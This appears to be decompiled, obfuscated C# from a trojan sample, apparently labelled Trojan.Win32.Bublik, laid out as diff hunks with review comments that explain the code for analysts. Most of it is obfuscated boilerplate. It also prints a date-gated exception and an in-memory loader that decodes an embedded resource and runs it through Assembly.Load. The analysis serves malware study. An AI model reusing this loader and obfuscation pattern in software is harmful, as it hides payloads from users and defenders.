using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace A
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class c9b81fdde8dea987fa347362a8b38f66c
{
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c989fcefb2025a0c5c08fe9654b0238e2> c6d6861147410be7d3c02208cc91f920b = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c989fcefb2025a0c5c08fe9654b0238e2>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c1a978f6ad601a840a4c556c463434740> cf1913bd55cb878b4fcc66db187333603 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c1a978f6ad601a840a4c556c463434740>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<User> c5882d9714618e820b0e232605fa4e6a8 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<User>();
private static c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a> c36a0c1af97c708258e8cb849995781ef = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d> c0f36fee1efd7b3eb9887972f47819e10 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d>();
[DebuggerNonUserCode]
static c9b81fdde8dea987fa347362a8b38f66c()
{
}
[HelpKeyword("My.Computer")]
internal static c989fcefb2025a0c5c08fe9654b0238e2 c92084a87c43349b13fd08cd6aff01d8f
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c6d6861147410be7d3c02208cc91f920b.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Application")]
internal static c1a978f6ad601a840a4c556c463434740 c8b84d0974b93f773bcc7dafeea38d1e0
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.cf1913bd55cb878b4fcc66db187333603.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.User")]
internal static User cd013fa95fd181d2291a68072d23b2631
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c5882d9714618e820b0e232605fa4e6a8.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Forms")]
internal static c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a c0d14e620a03587bae92914b08d618907
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c36a0c1af97c708258e8cb849995781ef.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.WebServices")]
internal static c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d cbbd6ff9682fa668906b1351d071467e4
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c0f36fee1efd7b3eb9887972f47819e10.ca3164a95c498711c0a73564c28375492;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class c02bb07968f48c37cae62c1da6810da6a
{
public Form1 cdb3f6ca4676597579d53d54a0d21304d;
[ThreadStatic]
private static Hashtable cc1f27d60b4baa0a608e20f5e465dfa47;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public c02bb07968f48c37cae62c1da6810da6a()
{
}
public Form1 cf7c417efd3c27564c3ec7f3ff8a83d6a
{
[DebuggerNonUserCode] get
{
this.cdb3f6ca4676597579d53d54a0d21304d = c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad<Form1>(this.cdb3f6ca4676597579d53d54a0d21304d);
return this.cdb3f6ca4676597579d53d54a0d21304d;
}
[DebuggerNonUserCode] set
{
if (value == this.cdb3f6ca4676597579d53d54a0d21304d)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (true)
break;
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.set_cf7c417efd3c27564c3ec7f3ff8a83d6a);
break;
}
}
else
{
if (value != null)
throw new ArgumentException(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(1));
this.cbb6da2598d8d80eb52e2d7caa80c7635<Form1>(ref this.cdb3f6ca4676597579d53d54a0d21304d);
}
}
}
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d ca56b1019bad311f5bf842dffe5f80e96)
where cd27155a99d37e18e8674d966126bfe7d : Form, new()
{
if ((object) ca56b1019bad311f5bf842dffe5f80e96 != null)
{
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad);
}
if (!ca56b1019bad311f5bf842dffe5f80e96.IsDisposed)
return ca56b1019bad311f5bf842dffe5f80e96;
label_5:
switch (1)
{
case 0:
goto label_5;
}
break;
}
}
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 != null)
{
label_7:
switch (5)
{
case 0:
goto label_7;
default:
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.ContainsKey((object) typeof (cd27155a99d37e18e8674d966126bfe7d)))
{
label_9:
switch (2)
{
case 0:
goto label_9;
default:
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(72)));
}
}
else
break;
}
}
else
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 = new Hashtable();
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Add((object) typeof (cd27155a99d37e18e8674d966126bfe7d), (object) null);
try
{
return new cd27155a99d37e18e8674d966126bfe7d();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
int num = ex.InnerException != null ? 1 : 0;
if (num != 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(129), ex.InnerException.Message), ex.InnerException);
}
finally
{
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Remove((object) typeof (cd27155a99d37e18e8674d966126bfe7d));
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : Form
{
c6ac98bb3a5ad66bccc6228eddd2a459e.Dispose();
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ca60e2e08a2723dd3c979d21ff53a885d
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ca60e2e08a2723dd3c979d21ff53a885d()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : new()
{
if ((object) c6ac98bb3a5ad66bccc6228eddd2a459e != null)
return c6ac98bb3a5ad66bccc6228eddd2a459e;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d.c34d836302883eefe8a38163efc65e0ad);
}
return new cd27155a99d37e18e8674d966126bfe7d();
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
{
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d> where cd27155a99d37e18e8674d966126bfe7d : new()
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public c5c7ec5333224c1213f04f873fa326520()
{
}
internal cd27155a99d37e18e8674d966126bfe7d ca3164a95c498711c0a73564c28375492
{
[DebuggerHidden] get
{
if ((object) c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 == null)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<>.get_ca3164a95c498711c0a73564c28375492);
}
c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 = new cd27155a99d37e18e8674d966126bfe7d();
break;
}
}
return c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529;
}
}
}
}
}
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: A.cb172a3cf4de66a26f276fa336a900f40
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class cb172a3cf4de66a26f276fa336a900f40
{
internal static void c8a7fc1893bd951199feb87a0595012ad()
{
DateTime dateTime = new DateTime(long.Parse(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(231)));
if (!(DateTime.Now > dateTime))
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad);
}
throw new Exception(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(268) + Assembly.GetExecutingAssembly().GetName().Name + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(299) + dateTime.ToString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(471)) + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(494));
}
}
}
}
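Review bot: `c8a7fc1893bd951199feb87a0595012ad()` is an undocumented start-up date gate: it parses string-table entry 231 as a tick count, builds a `DateTime` from it, and throws a plain `Exception` when `DateTime.Now` is later. The entry point in the `WindowsFormsApplicationBase` subclass earlier on the page calls it before `Run`, inside a `try` whose `finally` is empty, so once the local clock is past that value a run would presumably end in this exception instead of reaching the main form. I would add `// Date gate: throws once the local clock passes the tick value at string-table offset 231; message text is built from offsets 268, 299 and 494` above the method, so that an analyst who sees only the exception during dynamic analysis knows where it comes from. The `if (false)` block holding `__methodref` is a dead stub and can be marked as such in the same comment.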
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: A.cc67fcb12c7ab50e974a357101bdbe09d
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Club.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace A
{
[DebuggerNonUserCode]
[StandardModule]
[CompilerGenerated]
[HideModuleName]
internal sealed class cc67fcb12c7ab50e974a357101bdbe09d
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: A.ced138b6eee8b5fea3f196334f6720805
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class ced138b6eee8b5fea3f196334f6720805
{
private static readonly Assembly c7956d9417023ac40f6a0eb5665bf366c;
static ced138b6eee8b5fea3f196334f6720805()
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c != null)
return;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string name = executingAssembly.GetName().Name;
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (name == manifestResourceName)
{
label_6:
switch (3)
{
case 0:
goto label_6;
default:
ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c = Assembly.Load(c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(name)));
return;
}
}
}
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return;
}
}
}
internal static void c496a7d7e6524413c65d8aa7379640bb1() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
private static Assembly c3e00543c0030da506a3c9417db159586(
object c932adab82a8e17f3df4be69b90bf6c46,
ResolveEventArgs c40515e8f64a790a3f5078c209ce553e3)
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c == null)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
}
foreach (string manifestResourceName in ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c.GetManifestResourceNames())
{
if (manifestResourceName == c40515e8f64a790a3f5078c209ce553e3.Name)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
}
label_9:
switch (4)
{
case 0:
goto label_9;
default:
return (Assembly) null;
}
}
}
}
}
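Review bot: The static constructor of `ced138b6eee8b5fea3f196334f6720805` loads a second assembly from memory and nothing in the file says so. It looks for a manifest resource whose name equals the assembly's own name, passes the stream through `c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c`, and hands the resulting bytes to `Assembly.Load(byte[])`. `c496a7d7e6524413c65d8aa7379640bb1()`, which the `<Module>` static constructor at the top of this assembly calls, registers `c3e00543c0030da506a3c9417db159586` on `AppDomain.CurrentDomain.ResourceResolve`, and that handler returns the loaded assembly when the requested name is among its manifest resource names. A comment such as `// Loads the embedded assembly (resource named after this assembly) from a byte[] and serves its resources via ResourceResolve; this code does not write it to disk` would tell a reader that part of the sample's content lives inside that resource and is not visible in these decompiled classes. Whether the embedded assembly carries code or only resources cannot be told from this hunk, so the comment should leave that open.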
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: A.cfd7a845189f70212b2f34a945b41994e
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace A
{
[HideModuleName]
[CompilerGenerated]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
internal sealed class cfd7a845189f70212b2f34a945b41994e
{
private static ResourceManager c3447dff4f91dc625360969fe10241192;
private static CultureInfo c62aab94b28f8800816ce1c0e53e796ba;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192, (object) null))
{
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (cfd7a845189f70212b2f34a945b41994e.get_ResourceManager);
}
cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192 = new ResourceManager(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(202), typeof (cfd7a845189f70212b2f34a945b41994e).Assembly);
break;
}
}
return cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba;
set => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba = value;
}
}
}